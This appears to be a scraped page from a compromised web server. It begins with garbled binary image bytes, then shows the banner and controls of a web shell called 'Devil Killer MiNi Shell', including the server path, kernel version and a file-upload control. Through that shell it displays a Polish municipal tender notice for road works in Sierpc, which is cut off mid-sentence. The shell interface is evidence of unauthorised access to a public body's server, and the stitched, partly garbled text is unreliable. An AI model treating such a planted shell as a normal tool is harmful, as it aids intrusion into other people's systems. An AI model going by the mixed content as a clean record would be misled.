JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221209/0048652201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i budowa układu komunikacyjnego w rejonie ulic Jana Pawła II i Okulickiego w mieście Sierpc </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Sierpc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015483</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piastowska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sierpc</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48(24)2758654</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48(24)2758633</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">r.goszczycki@um.sierpc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.sierpc.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i budowa układu komunikacyjnego w rejonie ulic Jana Pawła II i Okulickiego w mieście Sierpc </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ba195e1-76f3-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00486522</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00030669/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Przebudowa i budowa układu komunikacyjnego w rejonie ulic Jana Pawła II i Okulickiego w mieście Sierpc</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umsierpc.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umsierpc.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://umsierpc.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. KTO JEST ADMINISTRATOREM DANYCH?<br/>Zgodnie z ogólnym rozporządzeniem o ochronie danych (RODO), administratorem Państwa danych osobowych jest Gmina Miasto Sierpc (ul. Piastowska 11a, 09-200 Sierpc) (Administrator) jako zamawiający. Kontakt z Administratorem: +48 24 275 86 86, info@sierpc.pl.<br/>Administrator jest odpowiedzialny za bezpieczeństwo przekazanych danych osobowych oraz przetwarzanie ich zgodnie z przepisami prawa.<br/>[Szczegółowa klauzula informacyjna RODO została określona w Rozdziale XXIII SWZ- ze względu na ograniczoną ilość wprowadzenia znaków w ogłoszeniu o zamówieniu]</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIR.271.21.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem umowy jest realizacja robót budowlanych w ramach zadania inwestycyjnego pn. „Przebudowa i budowa układu komunikacyjnego w rejonie ulic Jana Pawła II i Okulickiego w mieście Sierpc”.<br/>2.	Przedmiot umowy o którym mowa w pkt 1 obejmuje w szczególności realizację następujących robót:<br/>a)	roboty przygotowawcze i rozbiórkowe;<br/>b)	roboty ziemne związane z wykonaniem nawierzchni drogowej na ul. Jana Pawła II i Okulickiego;<br/>c)	roboty instalacyjne związane z wykonaniem nowego odcinka kanalizacji deszczowej w ul. Jana Pawła II;<br/>d)	regulacja studni kanalizacji sanitarnej, studni kanalizacji deszczowej oraz zasuw wodociągowych oraz montaż wraz z regulacją wpustów żeliwnych na istniejących studzienkach ściekowych w ul. Okulickiego (materiał przekazany przez Zamawiającego);<br/>e)	przebudowa odcinka sieci wodociągowej;<br/>f)	wykonanie podbudowy pod nawierzchnie drogowe na ul. Jana Pawła II i Okulickiego;<br/>g)	wykonanie frezowania nawierzchni asfaltowej (ul. Jana Pawła II): średnia grubość warstwy 4 cm wraz z odwozem urobku poza plac budowy do 6 km;<br/>Destrukt asfaltowy otrzymany z frezowania nawierzchni ul. Jana Pawła II w Sierpcu będzie stanowił materiał Zamawiającego i zostanie przewieziony w miejsce przez niego wskazane.<br/>h)	wykonanie nawierzchni jezdni z betonu asfaltowego (warstwa wiążąca i ścieralna) na ul. Jana Pawła II i Okulickiego;<br/>i)	wykonanie nawierzchni zjazdów (ul. Okulickiego) z kostki brukowej betonowej czerwonej o grubości 8 cm, na podsypce cementowo-piaskowej;<br/>j)	wykonanie nawierzchni ścieżki rowerowej (ul. Okulickiego) z kostki brukowej betonowej czerwonej niefazowanej o grubości 8 cm, na podsypce cementowo-piaskowej;<br/>k)	wykonanie nawierzchni zatoki postojowej (ul. Okulickiego), nawierzchni wyniesionego przejścia, nawierzchni progu zwalniającego listwowego oraz odtworzenia nawierzchni zatoki postojowej (ul. Jana Pawła II) z kostki brukowej betonowej szarej o grubości 8 cm, na podsypce cementowo-piaskowej;<br/>l)	wykonanie nawierzchni chodnika oraz jego odtworzenia (ul. Jana Pawła II i ul. Okulickiego) z kostki brukowej betonowej szarej o grubości 6 cm, na podsypce cementowo-piaskowej;<br/>m)	wykonanie nawierzchni chodnika z płyt betonowych z wypustami o wymiarach 35x35 cm, na podsypce cementowo-piaskowej (przy przejściach dla pieszych na ul. Jana Pawła II i ul. Okulickiego);<br/>n)	wykonanie humusowania z obsianiem mieszanką traw przy grubości ziemi urodzajnej (humusu) 10 cm, z dowozem ziemi urodzajnej z odległości 10 km (ul. Jana Pawła II i ul. Okulickiego);<br/>o)	wykonanie oznakowania poziomego cienkowarstwowego w kolorze białym (ul. Jana Pawła II i ul. Okulickiego), zgodnie z zatwierdzonym przez Starostę Sierpeckiego projektem stałej organizacji ruchu;<br/>p)	wykonanie oznakowania poziomego cienkowarstwowego w kolorze niebieskim (ul. Okulickiego), zgodnie z zatwierdzonym przez Starostę Sierpeckiego projektem stałej organizacji ruchu;<br/>q)	wykonanie nawierzchni antypoślizgowej z żywicy poliuretanowej w kolorze czerwonym (ścieżka rowerowa na ul. Okulickiego), zgodnie z zatwierdzonym przez Starostę Sierpeckiego projektem stałej organizacji ruchu;<br/>r)	wykonanie nowego oznakowania pionowego (ul. Jana Pawła II i ul. Okulickiego) w tym oznakowanie aktywne przejścia dla pieszych w ul. Jana Pawła II, zgodnie z zatwierdzonym przez Starostę Sierpeckiego projektem stałej organizacji ruchu;<br/>s)	przestawienie istniejącego oznakowania pionowego (ul. Okulickiego), zgodnie z zatwierdzonym przez Starostę Sierpeckiego projektem stałej organizacji ruchu;<br/>t)	wykonanie nowego aktywnego oznakowania pionowego przejścia dla pieszych (ul. Jana Pawła II), zgodnie z zatwierdzonym przez Starostę Sierpeckiego projektem stałej organizacji ruchu;<br/>u)	montaż prefabrykowanych progów wyspowych podrzutowych (ul. Okulickiego), zgodnie z zatwierdzonym przez Starostę Sierpeckiego projektem stałej organizacji ruchu;<br/>v)	wykonanie robót ziemnych dla potrzeb ułożenia kablowej linii oświetlenia ulicznego (ul. Okulickiego);<br/>w)	ułożenie linii kablowej oświetlenia ulicznego typu YAKXS-żo 5x25 mm²;<br/>x)	montaż prefabrykowanych fundamentów do słupów oświetleniowych;<br/>y)	montaż i stawianie słupów oświetleniowych aluminiowych o wysokości 8,0 m i grubości ścianki 3,5 mm;<br/>z)	montaż i stawianie słupów oświetleniowych aluminiowych o wysokości 8,0 m i grubości ścianki 3,5 mm, z dodatkowym wysięgnikiem na wysokości 5,0 m o długości 0,5 m;<br/>aa)	montaż wysięgników rurowych na słupach;<br/>bb)	montaż opraw oświetlenia zewnętrznego na wysięgnikach;<br/>cc)	dostawa i montaż szafki oświetleniowej termoutwardzalnej na fundamencie;<br/>dd)	zaprojektowanie i wykonanie przyłącza elektroenergetycznego dla potrzeb zasilania oświetlenia ul. Okulickiego;<br/>Zamawiający informuje, iż znajduje się w posiadaniu zgody właściciela terenu przyległego do drogi na przejście z trasą kabla do najbliższej stacji transformatorowej.<br/>ee)	przebudowa istniejących kabli elektroenergetycznych nN 0,4 kV (własność Energa-Operator SA), kolidujących z projektowaną ul. gen. Leopolda Okulickiego;<br/>ff)	budowa kanału technologicznego w ul. Okulickiego;<br/>gg)	dostawa, nasadzenie 39 sztuk klonu zwyczajnego wzdłuż projektowanej ul. gen. Leopolda Okulickiego w Sierpcu oraz pielęgnacja posadzonych drzew przez okres 12 miesięcy od podpisania protokołu odbioru końcowego robót bez wad.<br/>Lokalizacja drzew do nasadzenia została przedstawiona przez Projektanta na planie sytuacyjnym nasadzenia drzew.<br/>Natomiast wymagania Zamawiającego w zakresie parametrów dostarczanych drzew, sposobu ich nasadzenia czy rodzaju zabiegów pielęgnacyjnych wymaganych przez Zamawiającego w okresie 12 miesięcy od podpisania protokołu odbioru końcowego robót bez wad, zostały opisane w dokumencie pn. „Specyfikacja nasadzeń drzew”.<br/>3.	Szczegółowo przedmiot umowy opisują następujące dokumenty:<br/>a)	projekt budowlany i wykonawczy, tom I – projekt zagospodarowania terenu;<br/>b)	projekt budowlany i wykonawczy, tom II – projekt architektoniczno-budowlany branży drogowej;<br/>c)	projekt budowlany i wykonawczy, tom III – projekt architektoniczno-budowlany branży kanalizacyjnej (projekt budowy sieci kanalizacji deszczowej);<br/>d)	projekt budowlany i wykonawczy, tom IV – projekt architektoniczno-budowlany branży elektrycznej (projekt budowy sieci oświetlenia ulicznego);<br/>e)	projekt budowlany i wykonawczy, tom V – projekt architektoniczno-budowlany branży elektrycznej (projekt przebudowy sieci elektroenergetycznych);<br/>f)	projekt budowlany i wykonawczy, w tym projekt zagospodarowania terenu oraz projekt architektoniczno-budowlany branży telekomunikacyjnej;<br/>g)	Specyfikacje Techniczne Wykonania i Odbioru Robót w branży drogowej, sanitarnej i elektrycznej;<br/>h)	Specyfikacja Techniczna Wykonania i Odbioru Robót w branży telekomunikacyjnej;<br/>i)	przedmiar robót w branży drogowej i sanitarnej;<br/>j)	przedmiar robót w branży elektrycznej;<br/>k)	przedmiar robót w branży telekomunikacyjnej;<br/>l)	projekt stałej organizacji ruchu dla przebudowanej ul. Okulickiego i ul. Jana Pawła II w Sierpcu;<br/>m)	plan sytuacyjny nasadzenia drzew;<br/>n)	dokument pn. „Specyfikacja nasadzeń drzew”, dotyczący nasadzeń.<br/>4.	W celu oszacowania i wyceny zakresu robót zaleca się kierowanie dodatkowo:<br/>a)	wynikami szczegółowych wizji terenowych i inwentaryzacji własnych;<br/>b)	wynikami badań i pomiarów własnych;<br/>c)	wynikami opracowań własnych.<br/>5.	Wykonawca udziela Zamawiającemu zgodnie z § 8 Umowy, gwarancji jakości na wykonane roboty i zamontowane urządzenia.<br/>6.	Uprawnienia z tytułu rękojmi za wady przysługują Zamawiającemu przez okres 5 (pięciu) lat.<br/>7.	Na podstawie art. 95 ust. 1 ustawy Pzp, w związku z art. 438 ustawy Pzp, Zamawiający wymaga aby Wykonawca lub Podwykonawca zatrudniał na podstawie umowy o pracę (w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy), osoby wykonujące czynności w zakresie realizacji zamówienia, tj. 1 robotnika budowlanego.<br/>8.	W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności weryfikacyjnych i kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w pkt 7 czynności Zamawiający uprawniony jest do:<br/>a)	żądania oświadczenia wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności w związku z realizacją zamówienia, określającego liczbę osób zatrudnionych na podstawie umowy o pracę, rodzaje umów o pracę i wymiary etatów;<br/>b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów;<br/>c)	przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>9.	Z tytułu niespełnienia żądania określonego w pkt 8 lit. a Zamawiający naliczy kary umowne, określone w § 7 ust. 1 pkt 9 Umowy.<br/>10.	Zamawiający wymaga, aby wynagrodzenie za pracę osób zatrudnionych na podstawie umowy o pracę nie było niższe od obowiązującej wysokości wynagrodzenia minimalnego, ustalonej na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę.<br/>11.	Wykonawca i jego podwykonawcy zobowiązani są do uzyskania zgody od pracowników na przetwarzanie danych osobowych zgodnie z przepisami o ochronie danych osobowych.<br/>12.	Zgodnie z art. 100 ust. 1 ustawy Pzp Opis przedmiotu zamówienia jest sporządzony z uwzględnieniem wymagań w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112000-5 - Roboty w zakresie usuwania gleby</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający kierował się będzie kryteriami:<br/>	1) Cena (z VAT):	60%,<br/>	2) Gwarancja:	40%.<br/>2. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką może osiągnąć oferta wynosi 100. Punkty będą przyznawane według następujących zasad:<br/><br/>	1) Kryterium nr 1: Cena (60%) „C”, obliczona zostanie na postawie następującego wzoru:<br/>C= Cmin./Co ×100 pkt= ...pkt, gdzie:<br/>Cmin. – cena oferty najtańszej (brutto)<br/>Co – cena oferty ocenianej (brutto)<br/>(maksymalnie 100 pkt do zdobycia)<br/><br/>	2) Kryterium nr 2: Gwarancja (40%).<br/>Kryterium „Gwarancja” G- będzie rozpatrywane na podstawie okresu gwarancji jakości na roboty objęte przedmiotem zamówienia, podanej przez Wykonawcę w formularzu Oferty. Najkrótszy możliwy okres gwarancji jakości wymagany przez Zamawiającego (warunek konieczny) – 5 lat.<br/>Najdłuższy możliwy okres gwarancji jakości uwzględniony do oceny przez Zamawiającego – 7 lat.<br/>Termin gwarancji należy proponować w pełnych latach.<br/>Zamawiający przyzna punkty w następujący sposób:<br/>5 lat – 0 punktów;<br/>6 lat – 50 punktów;<br/>7 lat – 100 punktów;<br/>(maksymalnie 100 pkt do zdobycia)<br/>UWAGA:<br/>W przypadku nieokreślenia w formularzu ofertowym Kryterium nr 2, tj. „Gwarancja”, Zamawiający przyjmie gwarancję minimalną, tj. 5 lat i przyzna 0 pkt. W przedmiotowym kryterium.<br/>3. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium, obliczonych wg wzoru:<br/>P=C ×60% +G ×40%= ...pkt,gdzie:<br/>P – łączna liczba punktów przyznana ofercie ocenianej,<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”,<br/>G – liczba punktów przyznana ofercie ocenianej w kryterium „Gwarancja”.<br/>4. Łączna suma punktów przyznanych będzie zaokrąglana do dwóch miejsc po przecinku lub z większą dokładnością pozwalającą na wybór oferty o największej liczbie punków, jeżeli przy zastosowaniu wymienionego zaokrąglenia nie występuje różnica w ilości przyznanych punktów wynikająca z małej różnicy zaoferowanych cen.<br/>5. Zamawiający udzieli zamówienia publicznego na cały przedmiot zamówienia, temu z niewykluczonych z postępowania Wykonawców, którego oferta w toku oceny ofert nie zostanie odrzucona i zostanie uznana za najkorzystniejszą, tzn. otrzyma największą łączną sumę punków.<br/>6. Zgodnie z art. 223 ust. 2 ustawy Pzp, Zamawiający poprawi w ofercie oczywiste omyłki pisarskie, oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona. Jeżeli cena jednostkowa podana liczbą nie odpowiada cenie podanej słownie, przyjmuje się za prawidłową cenę jednostkową podaną liczbą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O zamówienie mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp tj.: <br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie precyzuje w tym zakresie szczególnych wymagań;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów: Zamawiający nie precyzuje w tym zakresie szczególnych wymagań ;<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie precyzuje w tym zakresie szczególnych wymagań ; <br/>4)	zdolności technicznej lub zawodowej: 